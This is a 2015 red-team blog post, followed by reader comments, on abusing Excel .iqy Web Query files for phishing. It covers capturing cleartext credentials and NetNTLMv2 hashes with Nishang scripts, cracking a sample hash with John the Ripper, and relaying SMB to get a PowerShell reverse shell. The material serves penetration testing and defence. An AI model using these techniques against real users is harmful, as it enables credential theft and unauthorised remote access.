Wednesday, August 26, 2015

Abusing Web Query (.iqy) files for effective phishing

Few days back I saw tweets from awesome Casey Smith about IQY files.
Like any penetration tester or red teamer worth his salt, I always try to use built in functionality of the target for my job. So this was obviously very interesting. Ability to make a web request using native/trusted tools is something no attacker would like to miss.

Casey soon tweeted a simple PoC.

I shared the grin! It is indeed easy yet effective phishing and much more. IQY files could be used for SMB relay attacks as well. Lets have a look at few possibilities.

Phishing for clear text credentials

I have created a PowerShell script which can generate an IQY file. I give you Out-WebQuery.ps1 which could be find in the Client directory of Nishang. Below is an example of using it:


For listener, lets use Start-CaptureServer.ps1. This script starts a HTTP listener and is capable of logging Basic and NTLM authentication requests made to it. It must be run from an elevated shell on the attacker's machine. For clear text credentials we must choose AuthType Basic, it could be used this way.

Now, the IQY file generated in the first step could be sent to a victim as an email attachment or trick a user in opening it from a URL or drop it on target's machine using a Human Interface Device. Anyways, the file is opened in MS Excel and the user gets a security warning.
 So, after clicking on enable, our target will see a prompt asking for credentials:
After the target user enter his credentials (they almost always do), we can see this on the listener and the log file:
Woohoo! User credentials in clear text.

Phishing for NTLM Hashes

Out-WebQuery and Start-CaptureServer can also be used to capture NTMLv2 hashes in the netntlm format from a target. There are less chances of getting caught while using hashes as compared to Basic authentication. The credential prompt user gets is less suspicious as well. We just need to use AuthType NTLM2.

And the hashes could be cracked using John the ripper. The hashes captured above should be used in hashes.txt in the below format
nikhil::PFPTLAB:00000000000000000000000000000000060380250000000F:970170524E4B2A0D00000000020000000000000000000000:1122334455667788
and
john --format=netntlm hashes.txt

We can also use Inveigh (https://github.com/Kevin-Robertson/Inveigh) for capturing hashes using PowerShell. It is much more versatile than Start-CaptureServer and has many more capabilities.

SMB Relay

We can use IQY files for SMB relaying as well. IQY files support UNC paths as well. In such a case, the user need not enter his credentials.
Unfortunately, there is no PowerShell code which is able to Relay hashes. Lets use smbrelayx from the Impacket library. Lets replay SMB captures from 192.168.230.111, a Windows 7 machine to 192.168.230.112 which is a Windows 8 machine in my lab.
The runps.exe above is a .Net Console application which runs an encoded PowerShell script on the target by calling powershell.exe. The encoded PowerShell script is the Invoke-PowerShellTcpOneLine from Nishang.

There are of course much better and stealthier methods of using calling PowerShell code from .Net but lets not discuss that.
Now, as soon as the target opens the IQY file sent to it:
Yay! An interactive PowerShell session. If you want, this can be easily upgraded to a meterpreter session as well. PowerShell payloads of msfvenom will be your friends.

Please note that there are tonnes of existing ways to perform the above attacks. See this nice blog post by Karl  https://blog.netspi.com/10-places-to-stick-your-unc-path/. In fact, the methods listed there could be used with Start-CaptureServer or Inveigh as well.

Out-WebQuery and Start-CaptureServer could be found in the Nishang repository: https://github.com/samratashok/nishang

I've never heard about abusing IQY files earlier and this is one more trick added to my and hopefully your collection of phishing tricks. Hope this would be useful to some of you.

If you liked the post and want to learn more and/or want to support my research and work, join me for a two days training "PowerShell for Penetration Testers" at:

DeepSec, Vienna (November 17-18th, 2015) - https://deepsec.net/speaker.html#WSLOT192


4 comments:

  1. Excellent post. Have you explored the possibility of using Powershell to relay NTLM credentials?

    ReplyDelete
    Replies
    1. Not yet. I believe Kevin Robertson, the creator of Inveigh is working on it.

      Delete
  2. + FullyQualifiedErrorId : DotNetMethodException

    ou cannot call a method on a null-valued expression.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:159 char:32
    $response.AddHeader <<<< ('WWW-Authenticate', 'Basic')
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    ou cannot call a method on a null-valued expression.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:160 char:26
    $response.AddHeader <<<< ("Content-Type","text/html")
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    ou cannot call a method on a null-valued expression.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:161 char:32
    $response.AddHeader <<<< ("Host","InternetGateway")
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    roperty 'StatusCode' cannot be found on this object; make sure it exists and is settable.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:162 char:17
    $response. <<<< StatusCode = 401
    + CategoryInfo : InvalidOperation: (StatusCode:String) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

    roperty 'ContentLength64' cannot be found on this object; make sure it exists and is sett
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:166 char:17
    $response. <<<< ContentLength64 = $buffer.length
    + CategoryInfo : InvalidOperation: (ContentLength64:String) [], RuntimeExcept
    + FullyQualifiedErrorId : PropertyNotFound

    ou cannot call a method on a null-valued expression.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:168 char:20
    $output.Write <<<< ($buffer, 0, $buffer.length)
    + CategoryInfo : InvalidOperation: (Write:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    ou cannot call a method on a null-valued expression.
    t F:\HACK\nishang\Utility\Start-CaptureServer.ps1:169 char:20
    $output.Close <<<< ()
    + CategoryInfo : InvalidOperation: (Close:String) [], RuntimeException

    ReplyDelete
    Replies
    1. From the above post "It (Start-CaptureServer) must be run from an elevated shell"

      Delete